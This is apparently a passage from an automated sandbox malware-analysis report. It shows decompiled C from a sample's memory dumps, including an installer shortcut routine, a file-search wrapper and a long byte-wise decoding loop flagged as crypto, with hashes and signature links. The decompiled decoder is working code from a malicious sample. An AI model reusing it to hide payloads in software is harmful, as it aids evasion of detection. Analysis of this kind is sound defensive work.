				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















              0x0040205c
              0x00402066
              0x0040206f
              0x00402079
              0x00402082
              0x0040208c
              0x00402090
              0x00402090
              0x00402095
              0x004020a6
              0x004020ae
              0x0040218e
              0x0040218e
              0x00402195
              0x004020b4
              0x004020b4
              0x004020c5
              0x004020c9
              0x004020cf
              0x004020d9
              0x004020db
              0x004020e6
              0x004020e9
              0x004020f6
              0x004020f8
              0x004020fa
              0x00402101
              0x00402104
              0x00402104
              0x00402107
              0x00402111
              0x00402119
              0x0040211e
              0x0040212a
              0x0040212a
              0x0040212d
              0x00402136
              0x00402139
              0x00402142
              0x00402147
              0x00402159
              0x00402168
              0x0040216a
              0x00402176
              0x00402176
              0x00402168
              0x00402178
              0x0040217e
              0x0040217e
              0x00402181
              0x00402187
              0x0040218c
              0x004021a1
              0x00000000
              0x00000000
              0x00000000
              0x0040218c
              0x00402197
              0x004028c1
              0x004028cd

              APIs
              • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?), ref: 004020A6
              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharCreateInstanceMultiWide
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 123533781-2935972921
              • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
              • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
              • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
              • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




              0x00402689
              0x0040269d
              0x004026a8
              0x004026a9
              0x004027e4
              0x0040268b
              0x0040268b
              0x0040268d
              0x0040268f
              0x0040268f
              0x004028c1
              0x004028cd

              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
              • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
              • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
              • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306BA78, Relevance: .4, Instructions: 362COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E7306BA78(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(_v12 < _a8) {
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000006a;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0x28;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0xf4;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000cf;
					_v5 = (_v5 & 0x000000ff) - 0xff;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000041;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x7f;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x42;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xfb;
					_v5 = _v5 & 0x000000ff ^ 0x000000b6;
					_v5 = (_v5 & 0x000000ff) - 0xf5;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000020;
					_v5 = (_v5 & 0x000000ff) + 0x50;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x79;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x82;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xaa;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xe3;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xf5;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0xc7;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x4a;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = (_v5 & 0x000000ff) - 0xfc;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x59;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = (_v5 & 0x000000ff) - 0x42;
					_v5 = _v5 & 0x000000ff ^ 0x000000f1;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}





              0x7306ba7d
              0x7306ba81
              0x7306ba8e
              0x7306baa2
              0x7306baab
              0x7306bab5
              0x7306babe
              0x7306bac8
              0x7306bad1
              0x7306bae4
              0x7306baee
              0x7306baf7
              0x7306bb03
              0x7306bb0d
              0x7306bb16
              0x7306bb20
              0x7306bb2c
              0x7306bb38
              0x7306bb41
              0x7306bb4b
              0x7306bb55
              0x7306bb68
              0x7306bb71
              0x7306bb7b
              0x7306bb84
              0x7306bb8d
              0x7306bb9f
              0x7306bba9
              0x7306bbb3
              0x7306bbbc
              0x7306bbc6
              0x7306bbd0
              0x7306bbda
              0x7306bbed
              0x7306bbf6
              0x7306bc00
              0x7306bc0a
              0x7306bc16
              0x7306bc22
              0x7306bc2e
              0x7306bc37
              0x7306bc41
              0x7306bc4b
              0x7306bc54
              0x7306bc5e
              0x7306bc67
              0x7306bc73
              0x7306bc7d
              0x7306bc8f
              0x7306bc99
              0x7306bca5
              0x7306bcb8
              0x7306bcc2
              0x7306bccb
              0x7306bcd4
              0x7306bce0
              0x7306bce9
              0x7306bcf3
              0x7306bd05
              0x7306bd0f
              0x7306bd19
              0x7306bd2c
              0x7306bd36
              0x7306bd3f
              0x7306bd49
              0x7306bd53
              0x7306bd5c
              0x7306bd66
              0x7306bd6f
              0x7306bd7b
              0x7306bd85
              0x7306bd91
              0x7306bd9b
              0x7306bda5
              0x7306bdb8
              0x7306bdc4
              0x7306bdd6
              0x7306bde0
              0x7306bdea
              0x7306bdf4
              0x7306bdfd
              0x7306be07
              0x7306be10
              0x7306be1a
              0x7306be24
              0x7306be2e
              0x7306be38
              0x7306be42
              0x7306be4b
              0x7306be55
              0x7306be5e
              0x7306be67
              0x7306be7a
              0x7306be84
              0x7306be96
              0x7306bea0
              0x7306beaa
              0x7306bebc
              0x7306bec6
              0x7306bed2
              0x7306bedb
              0x7306bee5
              0x7306bef7
              0x7306bf03
              0x7306ba8b
              0x7306ba8b
              0x7306bf10

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf9281222b952343c838f90d21169d66bb1197a50354fc7bd1d372df4429e503
              • Instruction ID: 8404e66f47246a8b7ec06dea96f9855f16dbf2580e5e49a8d80bd9bdd99c4e3a
              • Opcode Fuzzy Hash: bf9281222b952343c838f90d21169d66bb1197a50354fc7bd1d372df4429e503
              • Instruction Fuzzy Hash: 6202155485D2EDADDB06CBF984607FCBFB05D26102F0841CAE4E5E6283C53A938EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306BA87, Relevance: .4, Instructions: 354COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E7306BA87() {
				void* _t509;

				L0:
				while(1) {
					L0:
					 *(_t509 - 8) =  *(_t509 - 8) + 1;
					L1:
					if( *(_t509 - 8) <  *((intOrPtr*)(_t509 + 0xc))) {
						L2:
						 *(_t509 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t509 + 8)) +  *(_t509 - 8)));
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x0000006a;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x28;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xf4;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000cf;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xff;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t509 - 1) & 0x000000ff) << 0x00000002;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x00000041;
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x7f;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x42;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xfb;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000b6;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xf5;
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x00000020;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x50;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x79;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x82;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xaa;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t509 - 1) & 0x000000ff) << 0x00000003;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xe3;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xf5;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xc7;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x4a;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t509 - 1) & 0x000000ff) << 0x00000002;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xfc;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x59;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t509 - 1) & 0x000000ff) << 0x00000003;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x42;
						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000f1;
						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
						 *((char*)( *((intOrPtr*)(_t509 + 8)) +  *(_t509 - 8))) =  *(_t509 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t509 + 8));
					L4:
				}
			}




              0x7306ba87
              0x7306ba87
              0x7306ba87
              0x7306ba8b
              0x7306ba8e
              0x7306ba94
              0x7306ba9a
              0x7306baa2
              0x7306baab
              0x7306bab5
              0x7306babe
              0x7306bac8
              0x7306bad1
              0x7306bae4
              0x7306baee
              0x7306baf7
              0x7306bb03
              0x7306bb0d
              0x7306bb16
              0x7306bb20
              0x7306bb2c
              0x7306bb38
              0x7306bb41
              0x7306bb4b
              0x7306bb55
              0x7306bb68
              0x7306bb71
              0x7306bb7b
              0x7306bb84
              0x7306bb8d
              0x7306bb9f
              0x7306bba9
              0x7306bbb3
              0x7306bbbc
              0x7306bbc6
              0x7306bbd0
              0x7306bbda
              0x7306bbed
              0x7306bbf6
              0x7306bc00
              0x7306bc0a
              0x7306bc16
              0x7306bc22
              0x7306bc2e
              0x7306bc37
              0x7306bc41
              0x7306bc4b
              0x7306bc54
              0x7306bc5e
              0x7306bc67
              0x7306bc73
              0x7306bc7d
              0x7306bc8f
              0x7306bc99
              0x7306bca5
              0x7306bcb8
              0x7306bcc2
              0x7306bccb
              0x7306bcd4
              0x7306bce0
              0x7306bce9
              0x7306bcf3
              0x7306bd05
              0x7306bd0f
              0x7306bd19
              0x7306bd2c
              0x7306bd36
              0x7306bd3f
              0x7306bd49
              0x7306bd53
              0x7306bd5c
              0x7306bd66
              0x7306bd6f
              0x7306bd7b
              0x7306bd85
              0x7306bd91
              0x7306bd9b
              0x7306bda5
              0x7306bdb8
              0x7306bdc4
              0x7306bdd6
              0x7306bde0
              0x7306bdea
              0x7306bdf4
              0x7306bdfd
              0x7306be07
              0x7306be10
              0x7306be1a
              0x7306be24
              0x7306be2e
              0x7306be38
              0x7306be42
              0x7306be4b
              0x7306be55
              0x7306be5e
              0x7306be67
              0x7306be7a
              0x7306be84
              0x7306be96
              0x7306bea0
              0x7306beaa
              0x7306bebc
              0x7306bec6
              0x7306bed2
              0x7306bedb
              0x7306bee5
              0x7306bef7
              0x7306bf03
              0x00000000
              0x7306bf03
              0x7306bf0a
              0x7306bf10
              0x00000000
              0x7306bf10

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7e03b24fd26e53a165a1727b6dbd5fa1e284f3aa870073fdfa23fadb09b4614
